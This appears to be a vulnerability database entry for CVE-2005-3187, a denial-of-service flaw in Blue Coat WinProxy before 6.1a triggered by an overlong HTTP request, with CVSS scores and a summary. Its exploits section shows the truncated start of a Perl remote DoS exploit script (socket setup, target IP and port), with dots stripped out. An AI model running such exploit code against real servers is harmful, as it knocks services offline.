5
CVSSv2

CVE-2005-3187

Published: 31/12/2005 Updated: 08/03/2011
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The listening daemon in Blue Coat Systems Inc. WinProxy prior to 6.1a allows remote malicious users to cause a denial of service (crash) via a long HTTP request that causes an out-of-bounds read.

Vulnerable Product Search on Vulmon Subscribe to Product

bluecoat winproxy 6.0

Exploits

#!perl # # "WinProxy 60 R1c" Remote DoS Exploit # # Author: FistFucker # e-Mail: FistFuXXer@gmxde # # # Advisory: # wwwidefensecom/intelligence/vulnerabilities/displayphp?id=363 # # CVE info: # CAN-2005-3187 # use IO::Socket; # # destination IP address # $ip = '127001'; # # destination TCP port # $port = 80; print '"WinProxy 6 ...